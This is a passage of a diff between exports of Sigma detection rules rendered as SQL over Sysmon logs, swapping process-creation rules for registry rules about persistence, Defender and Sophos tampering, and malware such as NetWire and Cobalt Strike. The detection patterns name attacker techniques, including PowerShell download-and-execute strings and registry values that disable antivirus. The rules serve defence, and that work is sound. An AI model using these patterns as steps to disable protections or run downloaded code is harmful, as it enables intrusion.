'%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object 
Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.t1068" 
+ "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD 
(0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' 
ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 
'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR 
CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE 